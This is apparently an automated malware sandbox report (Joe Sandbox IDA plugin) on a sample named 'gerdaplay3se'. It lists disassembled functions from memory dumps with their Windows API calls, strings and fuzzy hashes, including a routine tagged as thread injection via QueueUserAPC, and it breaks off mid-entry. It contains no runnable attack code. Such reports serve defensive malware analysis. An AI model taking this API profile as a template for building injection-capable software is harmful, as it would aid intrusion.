Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: HeapValue$FreeProcess
String ID:
API String ID: 1812714009-0
Opcode ID: 3ecc70eac92de3f203ee17b65865058e0c3134a4f4fe5f0f928b149316923e45
Instruction ID: 3ee7f0247b59081aa32a8af97d55d435fbf4f00ea14fb6497078d4a2d1051506
Opcode Fuzzy Hash: 3ecc70eac92de3f203ee17b65865058e0c3134a4f4fe5f0f928b149316923e45
Instruction Fuzzy Hash: 68516C76A043449FD720DF29C848B26BBE4FB45764F298659F86D97380E778EC04CB91

Function 02D855C0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 02D856D0
__FindPESection.LIBCMT ref: 02D856EA

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 9717c332bf5be69b3fdb22679de319e9e6facd1b0b79ead16c7c018f6461393f
Instruction ID: 5c73616caa62db4241931b82b7a2b2276573b2694c8abfd65b180e22179da5f9
Opcode Fuzzy Hash: 9717c332bf5be69b3fdb22679de319e9e6facd1b0b79ead16c7c018f6461393f
Instruction Fuzzy Hash: A3A1A1B5A006158FDB24EF18E980BADB7F5FB45324F968669EC55A7340E731EC00CBA0

Function 00405B24 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B63
GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405B7D
GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BB1
MultiByteToWideChar.KERNEL32(004051A5,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BE9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C3F
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C51

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
Instruction ID: b73683cf29d179dc30ac0dacbc12c8afa3e963ef4805c6be7b54428ebd0f8a91
Opcode Fuzzy Hash: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
Instruction Fuzzy Hash: 1E417B71500609EFDF219F94DD86AAF7F79EB05750F10443AFA12B6290C339A960CBA9

Function 02D61C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D61CB1
CloseHandle.KERNEL32(?), ref: 02D61CBA
InterlockedExchangeAdd.KERNEL32(02D97244,00000000), ref: 02D61CC6
TerminateThread.KERNEL32(?,00000000), ref: 02D61CD4
QueueUserAPC.KERNEL32(02D61E7C,?,00000000), ref: 02D61CE1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D61CEC

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 1946104331-0
Opcode ID: 65ec3160d5313526364041d98ee3c40233452862b0b6fd1c040af7fdfb1be31f
Instruction ID: de6692df94707c74b9ef535a7a8700ccd88204e34ffc23aecd2ed38fa1a4b2dc
Opcode Fuzzy Hash: 65ec3160d5313526364041d98ee3c40233452862b0b6fd1c040af7fdfb1be31f
Instruction Fuzzy Hash: 10F08135960204BFE7104B96EC0DC6BFBBCEB45720B204659F52A82390DB709D10CB20

Function 02D70800 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179windowCOMMON

Download Yara Rule

APIs

Part of subcall function 02D69A10: __EH_prolog.LIBCMT ref: 02D69A15
Part of subcall function 02D69A10: _Allocate.LIBCPMT ref: 02D69A6C
Part of subcall function 02D69A10: _memmove.LIBCMT ref: 02D69AC3

_memset.LIBCMT ref: 02D70879
FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D708E2
GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D708EA

Strings

invalid string position, xrefs: 02D70A36
Unknown error, xrefs: 02D70939

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
String ID: Unknown error$invalid string position
API String ID: 1854462395-1837348584
Opcode ID: 5127ce64431425e9942b75dbf9714a7f54800c80e0a73c1450eee7972534828d
Instruction ID: de44a619ce2eb4dc063b359da01bf62b27f3f03ebf2291d03683741cc2fa8009
Opcode Fuzzy Hash: 5127ce64431425e9942b75dbf9714a7f54800c80e0a73c1450eee7972534828d
Instruction Fuzzy Hash: 0051BC702083419FE714DF24C890B2FBBE4EB98748F54092EF48297791E775E948CBA2

Function 004038A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 004038C7
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004038FC
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040395C

Strings

__MSVCRT_HEAP_SELECT, xrefs: 004038F7
__GLOBAL_HEAP_SELECTED, xrefs: 00403936

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
Instruction ID: dfbe321087950a958f1f5ebe55e663b38e75b845a74228cdfb1d658b51cb0ff2
Opcode Fuzzy Hash: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
Instruction Fuzzy Hash: A53127B29052446DEB319A705C46BDF3F6C9B02305F2400FBD185F52C2D2B99F85CB18

Function 02D71870 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 02D718BF

Part of subcall function 02D72413: std::exception::_Copy_str.LIBCMT ref: 02D7242C

Part of subcall function 02D70C90: __CxxThrowException@8.LIBCMT ref: 02D70CEE

std::exception::exception.LIBCMT ref: 02D7191E

Strings

boost unique_lock has no mutex, xrefs: 02D718AE
$, xrefs: 02D71923
boost unique_lock owns already the mutex, xrefs: 02D7190D

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
API String ID: 2140441600-46888669
Opcode ID: be97966c300bf5ced94c44939d6e85aa333227344877769a4465cae1fd2fab27
Instruction ID: d183bd4b047ad82c1a726811bf381bf05aa30fd23e33ab51d7a6c8ceed636dd3
Opcode Fuzzy Hash: be97966c300bf5ced94c44939d6e85aa333227344877769a4465cae1fd2fab27
Instruction Fuzzy Hash: 6C21D5B15183809FD760EF24C54575BBBE9BB88708F504A6DF4A587380E7B9D808CF92

Function 02D749BC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 02D749C0

Part of subcall function 02D75BB2: GetLastError.KERNEL32(76230A60,7622F550,02D75DA0,02D72F73,7622F550,?,02D6606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D66508), ref: 02D75BB4
Part of subcall function 02D75BB2: __calloc_crt.LIBCMT ref: 02D75BD5
Part of subcall function 02D75BB2: __initptd.LIBCMT ref: 02D75BF7
Part of subcall function 02D75BB2: GetCurrentThreadId.KERNEL32 ref: 02D75BFE
Part of subcall function 02D75BB2: SetLastError.KERNEL32(00000000,02D6606D,00000104,76230A60,7622F550,ntdll.dll,?,?,?,02D66508), ref: 02D75C16

__calloc_crt.LIBCMT ref: 02D749E3
__get_sys_err_msg.LIBCMT ref: 02D74A01
__invoke_watson.LIBCMT ref: 02D74A1E

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D749CB, 02D749F1

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 109275364-798102604
Opcode ID: f23cbed0c36f21a75055a05f346e1901980c53201e294782fd473e9f3725d567
Instruction ID: 9f2560c852d682cca3e8f3cff2d18750261f4b2aafa204a04f892d3c1684900e
Opcode Fuzzy Hash: f23cbed0c36f21a75055a05f346e1901980c53201e294782fd473e9f3725d567
Instruction Fuzzy Hash: 9DF0B4325447156AAB23A92A5C40A7B72BEEF416A4F01052AF9C5D6300FB29DC4096A5

Function 02D62341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000001), ref: 02D62350
InterlockedExchange.KERNEL32(?,00000001), ref: 02D62360
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D62370
GetLastError.KERNEL32 ref: 02D6237A

Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717

Strings

pqcs, xrefs: 02D62388

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
String ID: pqcs
API String ID: 1619523792-2559862021
Opcode ID: e4a4255b049fb8bf9b5d05a2cec7bbbc93240f46d00bc1cd263877e9bacd0d3b
Instruction ID: f555309ace93d900484f1d32f78b0dadba6e0117cc9cb12248801a18b013e93c
Opcode Fuzzy Hash: e4a4255b049fb8bf9b5d05a2cec7bbbc93240f46d00bc1cd263877e9bacd0d3b
Instruction Fuzzy Hash: EFF01D74950304ABE710AA74DC0DBBBB7BCEB01701F204569E845D6340F7709D148BA1

Function 02D64030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D64035
GetProcessHeap.KERNEL32(00000000,?), ref: 02D64042
RtlAllocateHeap.NTDLL(00000000), ref: 02D64049
std::exception::exception.LIBCMT ref: 02D64063

Part of subcall function 02D6A601: __EH_prolog.LIBCMT ref: 02D6A606
Part of subcall function 02D6A601: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D6A615
Part of subcall function 02D6A601: __CxxThrowException@8.LIBCMT ref: 02D6A634

Strings

bad allocation, xrefs: 02D64058

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
String ID: bad allocation
API String ID: 3112922283-2104205924
Opcode ID: 7e5ef05ac52e6f04f90c7e2c83375f4b6a6d98143dfbaff9ce1fcc23552b1f00
Instruction ID: 0db92e9eca2ac393666af4059dd02359f773e769a90ba0d9590796327c2e5e4b
Opcode Fuzzy Hash: 7e5ef05ac52e6f04f90c7e2c83375f4b6a6d98143dfbaff9ce1fcc23552b1f00
Instruction Fuzzy Hash: 84F058B1E44209EBDB00EFE0E908BAFB778FB04304FA04559E914A2340DB355A148B61

Function 004036D0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 00403729
GetFileType.KERNEL32(00000800), ref: 004037CF
GetStdHandle.KERNEL32(-000000F6), ref: 00403828
GetFileType.KERNEL32(00000000), ref: 00403836
SetHandleCount.KERNEL32 ref: 0040386D

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
Instruction ID: 340931fb5571d0dd89e9413526c141aa1936fc067e7847d678db743c6b9c99aa
Opcode Fuzzy Hash: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
Instruction Fuzzy Hash: A65136B25003508BD7209F28CD48B563FE8EB01336F19C67AE492EB2E1C738C955C75A

Function 02D71BC0 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02D71990: CloseHandle.KERNEL32(00000000,84A2267A), ref: 02D719E1
Part of subcall function 02D71990: WaitForSingleObject.KERNEL32(?,000000FF,84A2267A,?,?,?,?,84A2267A,02D71963,84A2267A), ref: 02D719F8

ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D71C5E
ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D71C7E
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D71CB7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D71D0B
SetEvent.KERNEL32(?), ref: 02D71D12

Part of subcall function 02D6418C: CloseHandle.KERNEL32(00000000,?,02D71C45), ref: 02D641B0

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
String ID:
API String ID: 4166353394-0
Opcode ID: 496e22b7d154a5b96e2177bea16a85b3232d7ac20427f752ba5597c48d762c7e
Instruction ID: 27fc61b34343a997ef07b044be739084ddcaec0eca7864b99312c1d97b3d5bb4
Opcode Fuzzy Hash: 496e22b7d154a5b96e2177bea16a85b3232d7ac20427f752ba5597c48d762c7e
Instruction Fuzzy Hash: 9D41BD71A003118BEB259F28CC80B26B7A4EF45724F2507A8EC19DB395E739DC11DFA6

Function 02D6E02F Relevance: 7.6, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6E034

Part of subcall function 02D61A01: TlsGetValue.KERNEL32 ref: 02D61A0A

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D6E0B3
RtlEnterCriticalSection.NTDLL(?), ref: 02D6E0CF
InterlockedIncrement.KERNEL32(02D95180), ref: 02D6E0F4
RtlLeaveCriticalSection.NTDLL(?), ref: 02D6E109

Part of subcall function 02D627F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D6284E

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
String ID:
API String ID: 1578506061-0
Opcode ID: b3b9272dc6a883d73f0a7153d9e3e59c2d312fb242a74baa71a73953eef84c8e
Instruction ID: ba749c47ecd264b713bd11ad34f49ade562ee4d5ef5e435b5d4e9b487a210718
Opcode Fuzzy Hash: b3b9272dc6a883d73f0a7153d9e3e59c2d312fb242a74baa71a73953eef84c8e
Instruction Fuzzy Hash: 7E3148B59016059FDB10DFA8D548AAEBBF8FF18310F20455ED849D7741E735AA04CFA0

Function 02D802E4 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02D802F0

Part of subcall function 02D72EEC: __FF_MSGBANNER.LIBCMT ref: 02D72F03
Part of subcall function 02D72EEC: __NMSG_WRITE.LIBCMT ref: 02D72F0A
Part of subcall function 02D72EEC: RtlAllocateHeap.NTDLL(00790000,00000000,00000001), ref: 02D72F2F

_free.LIBCMT ref: 02D80303

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: a83e4e44521e0ffda0455919de1892dcc38d83955a5e5f8acfe987d5610db684
Instruction ID: d0c4ca69d361337077024196f23fa044dbb313f2dff0fa2a9313b399d1a10635
Opcode Fuzzy Hash: a83e4e44521e0ffda0455919de1892dcc38d83955a5e5f8acfe987d5610db684
Instruction Fuzzy Hash: F111C632908615ABEB203F70BC48B6A3799DF05362F104925FD899A350EB39CC54CBA1

Function 02D621D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D621DA
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D621ED
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D62224
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D62237
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D62261

Part of subcall function 02D62341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62350
Part of subcall function 02D62341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62360
Part of subcall function 02D62341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D62370
Part of subcall function 02D62341: GetLastError.KERNEL32 ref: 02D6237A

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
String ID:
API String ID: 1856819132-0
Opcode ID: d44b5903b1247e325cc1e3e55e2e049a5daa46f36c040662b177b9690396d70c
Instruction ID: 5fbd7f746930159acc50e75637895118762998facfa241b7c073b02c248941e6
Opcode Fuzzy Hash: d44b5903b1247e325cc1e3e55e2e049a5daa46f36c040662b177b9690396d70c
Instruction Fuzzy Hash: 10117F71D14115DBDB01AFA4D84C6FEFBBAFB48310F20851AE855A2360D7714E61DB90

Function 02D62298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6229D
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D622B0
TlsGetValue.KERNEL32 ref: 02D622E7
TlsSetValue.KERNEL32(?), ref: 02D62300
TlsSetValue.KERNEL32(?,?,?), ref: 02D6231C

Part of subcall function 02D62341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62350
Part of subcall function 02D62341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D62360
Part of subcall function 02D62341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D62370
Part of subcall function 02D62341: GetLastError.KERNEL32 ref: 02D6237A

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
String ID:
API String ID: 1856819132-0
Opcode ID: ab2d38cef88904b0e9d26e21c5627830dd297a511342ee5d38cc9f60a7524c49
Instruction ID: 2fbfd23c4a02d778e2c5638415c1b987504c73adce936e81deb6f2fd046d8f28
Opcode Fuzzy Hash: ab2d38cef88904b0e9d26e21c5627830dd297a511342ee5d38cc9f60a7524c49
Instruction Fuzzy Hash: 04114CB1D141189BDB01AFA4D8489EEFBBAEF48310F14452AE805A3350D7714D61DB90

Function 02D6BC49 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02D6B09C: __EH_prolog.LIBCMT ref: 02D6B0A1

__CxxThrowException@8.LIBCMT ref: 02D6BC66

Part of subcall function 02D7449A: RaiseException.KERNEL32(?,?,02D6FA96,?,?,?,?,?,?,?,02D6FA96,?,02D90F78,?), ref: 02D744EF

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02D91D94,?,00000001), ref: 02D6BC7C
InterlockedExchange.KERNEL32(?,00000001), ref: 02D6BC8F
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02D91D94,?,00000001), ref: 02D6BC9F
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D6BCAD

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
String ID:
API String ID: 2725315915-0
Opcode ID: 18c865e30f6464ca15cbbdf069934b926ae30d3c276b2d74c65e7c2c892332f6
Instruction ID: 4ac2cb1cd9f9b5838ca456c2c9fc254bfc225978dabcbec980efe10e4626f7cf
Opcode Fuzzy Hash: 18c865e30f6464ca15cbbdf069934b926ae30d3c276b2d74c65e7c2c892332f6
Instruction Fuzzy Hash: 9B0186B6A50305AFEB10AEB4DC8DF96B7BDEB04359F204515F625E6390DB60ED058B20

Function 02D62420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D62432
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D62445
RtlEnterCriticalSection.NTDLL(?), ref: 02D62454
InterlockedExchange.KERNEL32(?,00000001), ref: 02D62469
RtlLeaveCriticalSection.NTDLL(?), ref: 02D62470

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
String ID:
API String ID: 747265849-0
Opcode ID: 270bbfc0e22d5b554b729d022282a062657176c673c7a9ca5e264252031e8c9a
Instruction ID: f2c3fae66db4bb309506f39221400f6939b12542ea406c6cacb93c53d9d473fd
Opcode Fuzzy Hash: 270bbfc0e22d5b554b729d022282a062657176c673c7a9ca5e264252031e8c9a
Instruction Fuzzy Hash: C8F01D76650204BBE6009AA1ED4DFE6B72CFB44711FA04811F601DA680D761BD20CBA1

Function 02D61EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(?), ref: 02D61ED2
PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D61EEA
RtlEnterCriticalSection.NTDLL(?), ref: 02D61EF9
InterlockedExchange.KERNEL32(?,00000001), ref: 02D61F0E
RtlLeaveCriticalSection.NTDLL(?), ref: 02D61F15

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
String ID:
API String ID: 830998967-0
Opcode ID: e566d8f32e5881cd0606811420ea754770077331516f5e3e9a67dcdaf2e6e2f8
Instruction ID: f9d6e87723dc8313c781f579ac212201bc59905bbd00b286960b7192472de91e
Opcode Fuzzy Hash: e566d8f32e5881cd0606811420ea754770077331516f5e3e9a67dcdaf2e6e2f8
Instruction Fuzzy Hash: BBF01776651605BBE700AFA1ED88FE6BB3CFF54745F200426F60196680D771A925CBA0

Function 02D68686 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 02D686EE
_memmove.LIBCMT ref: 02D6879C

Strings

string too long, xrefs: 02D68721, 02D687C3
invalid string position, xrefs: 02D68717

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 97519eff1f12a5f6464ff1f2359483f84939bac21fcf33f29cd7f0e21cee2d4c
Instruction ID: 28cc11895d7e46997aed28d052f6f77357772a1665f0e58ac4001feb0f3f55a5
Opcode Fuzzy Hash: 97519eff1f12a5f6464ff1f2359483f84939bac21fcf33f29cd7f0e21cee2d4c
Instruction Fuzzy Hash: 6B4192713003449FDB34DE69D888A76BBEAEB41764B10092DE956CB781C770ED0CDBA1

Function 02D630AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000), ref: 02D630C3
WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D63102
_memcmp.LIBCMT ref: 02D63141

Strings

255.255.255.255, xrefs: 02D63139

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: AddressErrorLastString_memcmp
String ID: 255.255.255.255
API String ID: 1618111833-2422070025
Opcode ID: 6fcea62c50f5055bb200d932038738817ee01b06de3f799ee10c9ac54c814b99
Instruction ID: e1a0e7cbf3435a6c73c0a50aee7efa01f610077028e8c2bc3620c8667a34c217
Opcode Fuzzy Hash: 6fcea62c50f5055bb200d932038738817ee01b06de3f799ee10c9ac54c814b99
Instruction Fuzzy Hash: FA31C171900304DFDB209F64C888B7EB7A6FF45725F1085A9E86997380EB799D45CB90

Function 02D6966E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D69673

Part of subcall function 02D61BA7: __EH_prolog.LIBCMT ref: 02D61BAC
Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61BBC
Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61BEA
Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61C13
Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61C56

